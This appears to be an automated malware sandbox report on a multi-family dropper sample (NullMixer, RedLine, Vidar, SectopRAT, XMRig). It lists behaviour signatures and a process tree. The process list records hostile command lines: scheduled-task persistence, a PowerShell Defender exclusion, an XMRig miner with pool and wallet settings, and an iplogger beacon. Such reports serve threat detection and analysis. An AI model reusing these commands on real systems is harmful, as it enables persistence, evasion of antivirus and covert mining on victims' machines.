Analysis Overview
SHA256
cfdcbcca4f75f287d6389cda895571530ddb9a2bbdf54cce52c1c65e969ac0a3
Threat Level: Known bad
The file cceff411feab78a02a22744e2eae9ab8_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
SectopRAT
PrivateLoader
Vidar family
RedLine payload
Sectoprat family
xmrig
Xmrig family
Nullmixer family
Redline family
Privateloader family
SectopRAT payload
RedLine
Vidar
NullMixer
XMRig Miner payload
Vidar Stealer
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
ASPack v2.12-2.42
Checks computer location settings
Reads user/profile data of web browsers
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-06 12:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1000 set thread context of 4760 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| PID 4604 set thread context of 5580 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c caa4baaf544.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 621c13b77.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe
e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe
caa4baaf544.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
c0f099be1ace2.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe
3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe
6f1aa71747b4a291.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe
24ebc9ce784c63.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe
621c13b77.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe
d55cc0d45c3a05.exe
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
09b9624c6ac9.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3016 -ip 3016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 556
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe" -a
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487159 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3312 -ip 3312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2380 -ip 2380
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 1072
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb24c746f8,0x7ffb24c74708,0x7ffb24c74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
